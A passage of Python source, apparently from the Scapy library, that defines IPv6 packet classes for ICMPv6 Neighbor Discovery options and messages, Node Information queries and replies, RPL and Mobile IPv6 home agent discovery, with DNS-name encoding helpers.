Neighbor Discovery - Home Agent Information" 1834 fields_desc = [ByteField("type", 8), 1835 ByteField("len", 1), 1836 ShortField("res", 0), 1837 ShortField("pref", 0), 1838 ShortField("lifetime", 1)] 1839 1840 def mysummary(self): 1841 return self.sprintf("%name% %pref% %lifetime% seconds") 1842 1843# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 1844 1845# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 1846 1847 1848class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1849 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 1850 fields_desc = [ByteField("type", 17), 1851 ByteField("len", 3), 1852 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 1853 2: "New Care-Of Address", 1854 3: "NAR's IP address"}), 1855 ByteField("plen", 64), 1856 IntField("res", 0), 1857 IP6Field("addr", "::")] 1858 1859 1860class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1861 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 1862 fields_desc = [ByteField("type", 18), 1863 ByteField("len", 3), 1864 ByteField("optcode", 0), 1865 ByteField("plen", 64), 1866 IntField("res", 0), 1867 IP6Field("prefix", "::")] 1868 1869 1870_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1871 1: "LLA for the new AP", 1872 2: "LLA of the MN", 1873 3: "LLA of the NAR", 1874 4: "LLA of the src of TrSolPr or PrRtAdv msg", 1875 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 1876 6: "No preifx info available for AP identified by the LLA", # noqa: E501 1877 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 1878 1879 1880class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1881 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 1882 fields_desc = [ByteField("type", 19), 1883 ByteField("len", 1), 1884 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 1885 MACField("lla", ETHER_ANY)] # We only support ethernet 1886 1887 1888class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 1889 name = "ICMPv6 Neighbor Discovery - MAP Option" 1890 fields_desc = [ByteField("type", 23), 1891 ByteField("len", 3), 1892 BitField("dist", 1, 4), 1893 BitField("pref", 15, 4), # highest availability 1894 BitField("R", 1, 1), 1895 BitField("res", 0, 7), 1896 IntField("validlifetime", 0xffffffff), 1897 IP6Field("addr", "::")] 1898 1899 1900class _IP6PrefixField(IP6Field): 1901 __slots__ = ["length_from"] 1902 1903 def __init__(self, name, default): 1904 IP6Field.__init__(self, name, default) 1905 self.length_from = lambda pkt: 8 * (pkt.len - 1) 1906 1907 def addfield(self, pkt, s, val): 1908 return s + self.i2m(pkt, val) 1909 1910 def getfield(self, pkt, s): 1911 tmp_len = self.length_from(pkt) 1912 p = s[:tmp_len] 1913 if tmp_len < 16: 1914 p += b'\x00' * (16 - tmp_len) 1915 return s[tmp_len:], self.m2i(pkt, p) 1916 1917 def i2len(self, pkt, x): 1918 return len(self.i2m(pkt, x)) 1919 1920 def i2m(self, pkt, x): 1921 tmp_len = pkt.len 1922 1923 if x is None: 1924 x = "::" 1925 if tmp_len is None: 1926 tmp_len = 1 1927 x = inet_pton(socket.AF_INET6, x) 1928 1929 if tmp_len is None: 1930 return x 1931 if tmp_len in [0, 1]: 1932 return b"" 1933 if tmp_len in [2, 3]: 1934 return x[:8 * (tmp_len - 1)] 1935 1936 return x + b'\x00' * 8 * (tmp_len - 3) 1937 1938 1939class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 1940 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 1941 fields_desc = [ByteField("type", 24), 1942 FieldLenField("len", None, length_of="prefix", fmt="B", 1943 adjust=lambda pkt, x: x // 8 + 1), 1944 ByteField("plen", None), 1945 BitField("res1", 0, 3), 1946 BitEnumField("prf", 0, 2, icmp6ndraprefs), 1947 BitField("res2", 0, 3), 1948 IntField("rtlifetime", 0xffffffff), 1949 _IP6PrefixField("prefix", None)] 1950 1951 def mysummary(self): 1952 return self.sprintf("%name% %prefix%/%plen% Preference %prf%") 1953 1954 1955class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 1956 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 1957 fields_desc = [ByteField("type", 25), 1958 FieldLenField("len", None, count_of="dns", fmt="B", 1959 adjust=lambda pkt, x: 2 * x + 1), 1960 ShortField("res", None), 1961 IntField("lifetime", 0xffffffff), 1962 IP6ListField("dns", [], 1963 length_from=lambda pkt: 8 * (pkt.len - 1))] 1964 1965 def mysummary(self): 1966 return self.sprintf("%name% " + ", ".join(self.dns)) 1967 1968 1969class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 1970 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 1971 fields_desc = [ByteField("type", 26), 1972 ByteField("len", 1), 1973 BitField("res", 0, 48)] 1974 1975# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 1976# described in section 3.1 of RFC 1035 1977# XXX Label should be at most 63 octets in length : we do not enforce it 1978# Total length of domain should be 255 : we do not enforce it either 1979 1980 1981class DomainNameListField(StrLenField): 1982 __slots__ = ["padded"] 1983 islist = 1 1984 padded_unit = 8 1985 1986 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 1987 self.padded = padded 1988 StrLenField.__init__(self, name, default, length_from=length_from) 1989 1990 def i2len(self, pkt, x): 1991 return len(self.i2m(pkt, x)) 1992 1993 def m2i(self, pkt, x): 1994 x = plain_str(x) # Decode bytes to string 1995 res = [] 1996 while x: 1997 # Get a name until \x00 is reached 1998 cur = [] 1999 while x and ord(x[0]) != 0: 2000 tmp_len = ord(x[0]) 2001 cur.append(x[1:tmp_len + 1]) 2002 x = x[tmp_len + 1:] 2003 if self.padded: 2004 # Discard following \x00 in padded mode 2005 if len(cur): 2006 res.append(".".join(cur) + ".") 2007 else: 2008 # Store the current name 2009 res.append(".".join(cur) + ".") 2010 if x and ord(x[0]) == 0: 2011 x = x[1:] 2012 return res 2013 2014 def i2m(self, pkt, x): 2015 def conditionalTrailingDot(z): 2016 if z and orb(z[-1]) == 0: 2017 return z 2018 return z + b'\x00' 2019 # Build the encode names 2020 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 2021 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 2022 2023 # In padded mode, add some \x00 bytes 2024 if self.padded and not len(ret_string) % self.padded_unit == 0: 2025 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 2026 2027 return ret_string 2028 2029 2030class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 2031 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 2032 fields_desc = [ByteField("type", 31), 2033 FieldLenField("len", None, length_of="searchlist", fmt="B", 2034 adjust=lambda pkt, x: 1 + x // 8), 2035 ShortField("res", None), 2036 IntField("lifetime", 0xffffffff), 2037 DomainNameListField("searchlist", [], 2038 length_from=lambda pkt: 8 * pkt.len - 8, 2039 padded=True) 2040 ] 2041 2042 def mysummary(self): 2043 return self.sprintf("%name% " + ", ".join(self.searchlist)) 2044 2045# End of ICMPv6 Neighbor Discovery Options. 2046 2047 2048class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): 2049 name = "ICMPv6 Neighbor Discovery - Router Solicitation" 2050 fields_desc = [ByteEnumField("type", 133, icmp6types), 2051 ByteField("code", 0), 2052 XShortField("cksum", None), 2053 IntField("res", 0)] 2054 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} 2055 2056 2057class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): 2058 name = "ICMPv6 Neighbor Discovery - Router Advertisement" 2059 fields_desc = [ByteEnumField("type", 134, icmp6types), 2060 ByteField("code", 0), 2061 XShortField("cksum", None), 2062 ByteField("chlim", 0), 2063 BitField("M", 0, 1), 2064 BitField("O", 0, 1), 2065 BitField("H", 0, 1), 2066 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 2067 BitField("P", 0, 1), 2068 BitField("res", 0, 2), 2069 ShortField("routerlifetime", 1800), 2070 IntField("reachabletime", 0), 2071 IntField("retranstimer", 0)] 2072 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2073 2074 def answers(self, other): 2075 return isinstance(other, ICMPv6ND_RS) 2076 2077 def mysummary(self): 2078 return self.sprintf("%name% Lifetime %routerlifetime% " 2079 "Hop Limit %chlim% Preference %prf% " 2080 "Managed %M% Other %O% Home %H%") 2081 2082 2083class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2084 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" 2085 fields_desc = [ByteEnumField("type", 135, icmp6types), 2086 ByteField("code", 0), 2087 XShortField("cksum", None), 2088 IntField("res", 0), 2089 IP6Field("tgt", "::")] 2090 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2091 2092 def mysummary(self): 2093 return self.sprintf("%name% (tgt: %tgt%)") 2094 2095 def hashret(self): 2096 return bytes_encode(self.tgt) + self.payload.hashret() 2097 2098 2099class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2100 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" 2101 fields_desc = [ByteEnumField("type", 136, icmp6types), 2102 ByteField("code", 0), 2103 XShortField("cksum", None), 2104 BitField("R", 1, 1), 2105 BitField("S", 0, 1), 2106 BitField("O", 1, 1), 2107 XBitField("res", 0, 29), 2108 IP6Field("tgt", "::")] 2109 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2110 2111 def mysummary(self): 2112 return self.sprintf("%name% (tgt: %tgt%)") 2113 2114 def hashret(self): 2115 return bytes_encode(self.tgt) + self.payload.hashret() 2116 2117 def answers(self, other): 2118 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt 2119 2120# associated possible options : target link-layer option, Redirected header 2121 2122 2123class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2124 name = "ICMPv6 Neighbor Discovery - Redirect" 2125 fields_desc = [ByteEnumField("type", 137, icmp6types), 2126 ByteField("code", 0), 2127 XShortField("cksum", None), 2128 XIntField("res", 0), 2129 IP6Field("tgt", "::"), 2130 IP6Field("dst", "::")] 2131 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2132 2133 2134# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 2135 2136class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): 2137 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" 2138 fields_desc = [ByteField("type", 9), 2139 FieldLenField("len", None, count_of="addrlist", fmt="B", 2140 adjust=lambda pkt, x: 2 * x + 1), 2141 StrFixedLenField("res", b"\x00" * 6, 6), 2142 IP6ListField("addrlist", [], 2143 length_from=lambda pkt: 8 * (pkt.len - 1))] 2144 2145 2146class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): 2147 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" 2148 type = 10 2149 2150 2151# RFC3122 2152# Options requises : source lladdr et target lladdr 2153# Autres options valides : source address list, MTU 2154# - Comme precise dans le document, il serait bien de prendre l'adresse L2 2155# demandee dans l'option requise target lladdr et l'utiliser au niveau 2156# de l'adresse destination ethernet si aucune adresse n'est precisee 2157# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes 2158# les options. 2159# Ether() must use the target lladdr as destination 2160class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): 2161 name = "ICMPv6 Inverse Neighbor Discovery Solicitation" 2162 fields_desc = [ByteEnumField("type", 141, icmp6types), 2163 ByteField("code", 0), 2164 XShortField("cksum", None), 2165 XIntField("reserved", 0)] 2166 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2167 2168# Options requises : target lladdr, target address list 2169# Autres options valides : MTU 2170 2171 2172class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): 2173 name = "ICMPv6 Inverse Neighbor Discovery Advertisement" 2174 fields_desc = [ByteEnumField("type", 142, icmp6types), 2175 ByteField("code", 0), 2176 XShortField("cksum", None), 2177 XIntField("reserved", 0)] 2178 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2179 2180 2181############################################################################### 2182# ICMPv6 Node Information Queries (RFC 4620) 2183############################################################################### 2184 2185# [ ] Add automatic destination address computation using computeNIGroupAddr 2186# in IPv6 class (Scapy6 modification when integrated) if : 2187# - it is not provided 2188# - upper layer is ICMPv6NIQueryName() with a valid value 2189# [ ] Try to be liberal in what we accept as internal values for _explicit_ 2190# DNS elements provided by users. Any string should be considered 2191# valid and kept like it has been provided. At the moment, i2repr() will 2192# crash on many inputs 2193# [ ] Do the documentation 2194# [ ] Add regression tests 2195# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 2196# [ ] Check if there are differences between different stacks. Among *BSD, 2197# with others. 2198# [ ] Deal with flags in a consistent way. 2199# [ ] Implement compression in names2dnsrepr() and decompresiion in 2200# dnsrepr2names(). Should be deactivable. 2201 2202icmp6_niqtypes = {0: "NOOP", 2203 2: "Node Name", 2204 3: "IPv6 Address", 2205 4: "IPv4 Address"} 2206 2207 2208class _ICMPv6NIHashret: 2209 def hashret(self): 2210 return bytes_encode(self.nonce) 2211 2212 2213class _ICMPv6NIAnswers: 2214 def answers(self, other): 2215 return self.nonce == other.nonce 2216 2217# Buggy; always returns the same value during a session 2218 2219 2220class NonceField(StrFixedLenField): 2221 def __init__(self, name, default=None): 2222 StrFixedLenField.__init__(self, name, default, 8) 2223 if default is None: 2224 self.default = self.randval() 2225 2226 2227@conf.commands.register 2228def computeNIGroupAddr(name): 2229 """Compute the NI group Address. Can take a FQDN as input parameter""" 2230 name = name.lower().split(".")[0] 2231 record = chr(len(name)) + name 2232 h = md5(record.encode("utf8")) 2233 h = h.digest() 2234 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) 2235 return addr 2236 2237 2238# Here is the deal. First, that protocol is a piece of shit. Then, we 2239# provide 4 classes for the different kinds of Requests (one for every 2240# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 2241# data field class that is made to be smart by guessing the specific 2242# type of value provided : 2243# 2244# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 2245# if not overridden by user 2246# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 2247# if not overridden 2248# - Name in the other cases: code is set to 0, if not overridden by user 2249# 2250# Internal storage, is not only the value, but the a pair providing 2251# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) 2252# 2253# Note : I merged getfield() and m2i(). m2i() should not be called 2254# directly anyway. Same remark for addfield() and i2m() 2255# 2256# -- arno 2257 2258# "The type of information present in the Data field of a query is 2259# declared by the ICMP Code, whereas the type of information in a 2260# Reply is determined by the Qtype" 2261 2262def names2dnsrepr(x): 2263 """ 2264 Take as input a list of DNS names or a single DNS name 2265 and encode it in DNS format (with possible compression) 2266 If a string that is already a DNS name in DNS format 2267 is passed, it is returned unmodified. Result is a string. 2268 !!! At the moment, compression is not implemented !!! 2269 """ 2270 2271 if isinstance(x, bytes): 2272 if x and x[-1:] == b'\x00': # stupid heuristic 2273 return x 2274 x = [x] 2275 2276 res = [] 2277 for n in x: 2278 termin = b"\x00" 2279 if n.count(b'.') == 0: # single-component gets one more 2280 termin += b'\x00' 2281 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin 2282 res.append(n) 2283 return b"".join(res) 2284 2285 2286def dnsrepr2names(x): 2287 """ 2288 Take as input a DNS encoded string (possibly compressed) 2289 and returns a list of DNS names contained in it. 2290 If provided string is already in printable format 2291 (does not end with a null character, a one element list 2292 is returned). Result is a list. 2293 """ 2294 res = [] 2295 cur = b"" 2296 while x: 2297 tmp_len = orb(x[0]) 2298 x = x[1:] 2299 if not tmp_len: 2300 if cur and cur[-1:] == b'.': 2301 cur = cur[:-1] 2302 res.append(cur) 2303 cur = b"" 2304 if x and orb(x[0]) == 0: # single component 2305 x = x[1:] 2306 continue 2307 if tmp_len & 0xc0: # XXX TODO : work on that -- arno 2308 raise Exception("DNS message can't be compressed at this point!") 2309 cur += x[:tmp_len] + b"." 2310 x = x[tmp_len:] 2311 return res 2312 2313 2314class NIQueryDataField(StrField): 2315 def __init__(self, name, default): 2316 StrField.__init__(self, name, default) 2317 2318 def i2h(self, pkt, x): 2319 if x is None: 2320 return x 2321 t, val = x 2322 if t == 1: 2323 val = dnsrepr2names(val)[0] 2324 return val 2325 2326 def h2i(self, pkt, x): 2327 if x is tuple and isinstance(x[0], int): 2328 return x 2329 2330 # Try IPv6 2331 try: 2332 inet_pton(socket.AF_INET6, x.decode()) 2333 return (0, x.decode()) 2334 except Exception: 2335 pass 2336 # Try IPv4 2337 try: 2338 inet_pton(socket.AF_INET, x.decode()) 2339 return (2, x.decode()) 2340 except Exception: 2341 pass 2342 # Try DNS 2343 if x is None: 2344 x = b"" 2345 x = names2dnsrepr(x) 2346 return (1, x) 2347 2348 def i2repr(self, pkt, x): 2349 t, val = x 2350 if t == 1: # DNS Name 2351 # we don't use dnsrepr2names() to deal with 2352 # possible weird data extracted info 2353 res = [] 2354 while val: 2355 tmp_len = orb(val[0]) 2356 val = val[1:] 2357 if tmp_len == 0: 2358 break 2359 res.append(plain_str(val[:tmp_len]) + ".") 2360 val = val[tmp_len:] 2361 tmp = "".join(res) 2362 if tmp and tmp[-1] == '.': 2363 tmp = tmp[:-1] 2364 return tmp 2365 return repr(val) 2366 2367 def getfield(self, pkt, s): 2368 qtype = getattr(pkt, "qtype") 2369 if qtype == 0: # NOOP 2370 return s, (0, b"") 2371 else: 2372 code = getattr(pkt, "code") 2373 if code == 0: # IPv6 Addr 2374 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) 2375 elif code == 2: # IPv4 Addr 2376 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) 2377 else: # Name or Unknown 2378 return b"", (1, s) 2379 2380 def addfield(self, pkt, s, val): 2381 if ((isinstance(val, tuple) and val[1] is None) or 2382 val is None): 2383 val = (1, b"") 2384 t = val[0] 2385 if t == 1: 2386 return s + val[1] 2387 elif t == 0: 2388 return s + inet_pton(socket.AF_INET6, val[1]) 2389 else: 2390 return s + inet_pton(socket.AF_INET, val[1]) 2391 2392 2393class NIQueryCodeField(ByteEnumField): 2394 def i2m(self, pkt, x): 2395 if x is None: 2396 d = pkt.getfieldval("data") 2397 if d is None: 2398 return 1 2399 elif d[0] == 0: # IPv6 address 2400 return 0 2401 elif d[0] == 1: # Name 2402 return 1 2403 elif d[0] == 2: # IPv4 address 2404 return 2 2405 else: 2406 return 1 2407 return x 2408 2409 2410_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 2411 2412# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 2413# 8: "Link-local addresses", 16: "Site-local addresses", 2414# 32: "Global addresses" } 2415 2416# "This NI type has no defined flags and never has a Data Field". Used 2417# to know if the destination is up and implements NI protocol. 2418 2419 2420class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): 2421 name = "ICMPv6 Node Information Query - NOOP Query" 2422 fields_desc = [ByteEnumField("type", 139, icmp6types), 2423 NIQueryCodeField("code", None, _niquery_code), 2424 XShortField("cksum", None), 2425 ShortEnumField("qtype", 0, icmp6_niqtypes), 2426 BitField("unused", 0, 10), 2427 FlagsField("flags", 0, 6, "TACLSG"), 2428 NonceField("nonce", None), 2429 NIQueryDataField("data", None)] 2430 2431 2432class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): 2433 name = "ICMPv6 Node Information Query - IPv6 Name Query" 2434 qtype = 2 2435 2436# We ask for the IPv6 address of the peer 2437 2438 2439class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): 2440 name = "ICMPv6 Node Information Query - IPv6 Address Query" 2441 qtype = 3 2442 flags = 0x3E 2443 2444 2445class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): 2446 name = "ICMPv6 Node Information Query - IPv4 Address Query" 2447 qtype = 4 2448 2449 2450_nireply_code = {0: "Successful Reply", 2451 1: "Response Refusal", 2452 3: "Unknown query type"} 2453 2454_nireply_flags = {1: "Reply set incomplete", 2455 2: "All unicast addresses", 2456 4: "IPv4 addresses", 2457 8: "Link-local addresses", 2458 16: "Site-local addresses", 2459 32: "Global addresses"} 2460 2461# Internal repr is one of those : 2462# (0, "some string") : unknown qtype value are mapped to that one 2463# (3, [ (ttl, ip6), ... ]) 2464# (4, [ (ttl, ip4), ... ]) 2465# (2, [ttl, dns_names]) : dns_names is one string that contains 2466# all the DNS names. Internally it is kept ready to be sent 2467# (undissected). i2repr() decode it for user. This is to 2468# make build after dissection bijective. 2469# 2470# I also merged getfield() and m2i(), and addfield() and i2m(). 2471 2472 2473class NIReplyDataField(StrField): 2474 2475 def i2h(self, pkt, x): 2476 if x is None: 2477 return x 2478 t, val = x 2479 if t == 2: 2480 ttl, dnsnames = val 2481 val = [ttl] + dnsrepr2names(dnsnames) 2482 return val 2483 2484 def h2i(self, pkt, x): 2485 qtype = 0 # We will decode it as string if not 2486 # overridden through 'qtype' in pkt 2487 2488 # No user hint, let's use 'qtype' value for that purpose 2489 if not isinstance(x, tuple): 2490 if pkt is not None: 2491 qtype = pkt.qtype 2492 else: 2493 qtype = x[0] 2494 x = x[1] 2495 2496 # From that point on, x is the value (second element of the tuple) 2497 2498 if qtype == 2: # DNS name 2499 if isinstance(x, (str, bytes)): # listify the string 2500 x = [x] 2501 if isinstance(x, list): 2502 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 2503 if x and isinstance(x[0], six.integer_types): 2504 ttl = x[0] 2505 names = x[1:] 2506 else: 2507 ttl = 0 2508 names = x 2509 return (2, [ttl, names2dnsrepr(names)]) 2510 2511 elif qtype in [3, 4]: # IPv4 or IPv6 addr 2512 if not isinstance(x, list): 2513 x = [x] # User directly provided an IP, instead of list 2514 2515 def fixvalue(x): 2516 # List elements are not tuples, user probably 2517 # omitted ttl value : we will use 0 instead 2518 if not isinstance(x, tuple): 2519 x = (0, x) 2520 # Decode bytes 2521 if six.PY3 and isinstance(x[1], bytes): 2522 x = (x[0], x[1].decode()) 2523 return x 2524 2525 return (qtype, [fixvalue(d) for d in x]) 2526 2527 return (qtype, x) 2528 2529 def addfield(self, pkt, s, val): 2530 t, tmp = val 2531 if tmp is None: 2532 tmp = b"" 2533 if t == 2: 2534 ttl, dnsstr = tmp 2535 return s + struct.pack("!I", ttl) + dnsstr 2536 elif t == 3: 2537 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 2538 elif t == 4: 2539 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 2540 else: 2541 return s + tmp 2542 2543 def getfield(self, pkt, s): 2544 code = getattr(pkt, "code") 2545 if code != 0: 2546 return s, (0, b"") 2547 2548 qtype = getattr(pkt, "qtype") 2549 if qtype == 0: # NOOP 2550 return s, (0, b"") 2551 2552 elif qtype == 2: 2553 if len(s) < 4: 2554 return s, (0, b"") 2555 ttl = struct.unpack("!I", s[:4])[0] 2556 return b"", (2, [ttl, s[4:]]) 2557 2558 elif qtype == 3: # IPv6 addresses with TTLs 2559 # XXX TODO : get the real length 2560 res = [] 2561 while len(s) >= 20: # 4 + 16 2562 ttl = struct.unpack("!I", s[:4])[0] 2563 ip = inet_ntop(socket.AF_INET6, s[4:20]) 2564 res.append((ttl, ip)) 2565 s = s[20:] 2566 return s, (3, res) 2567 2568 elif qtype == 4: # IPv4 addresses with TTLs 2569 # XXX TODO : get the real length 2570 res = [] 2571 while len(s) >= 8: # 4 + 4 2572 ttl = struct.unpack("!I", s[:4])[0] 2573 ip = inet_ntop(socket.AF_INET, s[4:8]) 2574 res.append((ttl, ip)) 2575 s = s[8:] 2576 return s, (4, res) 2577 else: 2578 # XXX TODO : implement me and deal with real length 2579 return b"", (0, s) 2580 2581 def i2repr(self, pkt, x): 2582 if x is None: 2583 return "[]" 2584 2585 if isinstance(x, tuple) and len(x) == 2: 2586 t, val = x 2587 if t == 2: # DNS names 2588 ttl, tmp_len = val 2589 tmp_len = dnsrepr2names(tmp_len) 2590 names_list = (plain_str(name) for name in tmp_len) 2591 return "ttl:%d %s" % (ttl, ",".join(names_list)) 2592 elif t == 3 or t == 4: 2593 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 2594 return repr(val) 2595 return repr(x) # XXX should not happen 2596 2597# By default, sent responses have code set to 0 (successful) 2598 2599 2600class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): 2601 name = "ICMPv6 Node Information Reply - NOOP Reply" 2602 fields_desc = [ByteEnumField("type", 140, icmp6types), 2603 ByteEnumField("code", 0, _nireply_code), 2604 XShortField("cksum", None), 2605 ShortEnumField("qtype", 0, icmp6_niqtypes), 2606 BitField("unused", 0, 10), 2607 FlagsField("flags", 0, 6, "TACLSG"), 2608 NonceField("nonce", None), 2609 NIReplyDataField("data", None)] 2610 2611 2612class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): 2613 name = "ICMPv6 Node Information Reply - Node Names" 2614 qtype = 2 2615 2616 2617class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): 2618 name = "ICMPv6 Node Information Reply - IPv6 addresses" 2619 qtype = 3 2620 2621 2622class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): 2623 name = "ICMPv6 Node Information Reply - IPv4 addresses" 2624 qtype = 4 2625 2626 2627class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): 2628 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" 2629 code = 1 2630 2631 2632class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): 2633 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" 2634 code = 2 2635 2636 2637def _niquery_guesser(p): 2638 cls = conf.raw_layer 2639 type = orb(p[0]) 2640 if type == 139: # Node Info Query specific stuff 2641 if len(p) > 6: 2642 qtype, = struct.unpack("!H", p[4:6]) 2643 cls = {0: ICMPv6NIQueryNOOP, 2644 2: ICMPv6NIQueryName, 2645 3: ICMPv6NIQueryIPv6, 2646 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) 2647 elif type == 140: # Node Info Reply specific stuff 2648 code = orb(p[1]) 2649 if code == 0: 2650 if len(p) > 6: 2651 qtype, = struct.unpack("!H", p[4:6]) 2652 cls = {2: ICMPv6NIReplyName, 2653 3: ICMPv6NIReplyIPv6, 2654 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) 2655 elif code == 1: 2656 cls = ICMPv6NIReplyRefuse 2657 elif code == 2: 2658 cls = ICMPv6NIReplyUnknown 2659 return cls 2660 2661 2662############################################################################# 2663############################################################################# 2664# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 2665############################################################################# 2666############################################################################# 2667 2668# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes 2669rplcodes = {0: "DIS", 2670 1: "DIO", 2671 2: "DAO", 2672 3: "DAO-ACK", 2673 # 4: "P2P-DRO", 2674 # 5: "P2P-DRO-ACK", 2675 # 6: "Measurement", 2676 7: "DCO", 2677 8: "DCO-ACK"} 2678 2679 2680class ICMPv6RPL(_ICMPv6): # RFC 6550 2681 name = 'RPL' 2682 fields_desc = [ByteEnumField("type", 155, icmp6types), 2683 ByteEnumField("code", 0, rplcodes), 2684 XShortField("cksum", None)] 2685 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} 2686 2687 2688############################################################################# 2689############################################################################# 2690# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 2691############################################################################# 2692############################################################################# 2693 2694# Mobile IPv6 ICMPv6 related classes 2695 2696class ICMPv6HAADRequest(_ICMPv6): 2697 name = 'ICMPv6 Home Agent Address Discovery Request' 2698 fields_desc = [ByteEnumField("type", 144, icmp6types), 2699 ByteField("code", 0), 2700 XShortField("cksum", None), 2701 XShortField("id", None), 2702 BitEnumField("R", 1, 1, {1: 'MR'}), 2703 XBitField("res", 0, 15)] 2704 2705 def hashret(self): 2706 return struct.pack("!H", self.id) + self.payload.hashret() 2707 2708 2709class ICMPv6HAADReply(_ICMPv6): 2710 name = 'ICMPv6 Home Agent Address Discovery Reply' 2711 fields_desc = [ByteEnumField("type", 145, icmp6types), 2712 ByteField("code", 0), 2713 XShortField("cksum", None), 2714 XShortField("id", None), 2715 BitEnumField("R", 1, 1, {1: 'MR'}), 2716 XBitField("res", 0, 15), 2717 IP6ListField('addresses', None)] 2718 2719 def hashret(self): 2720 return struct.pack("!H", self.id) + self.payload.hashret() 2721 2722 def answers(self, other): 2723 if not isinstance(other, ICMPv6HAADRequest): 2724 return 0 2725 return self.id == other.id 2726 2727 2728class 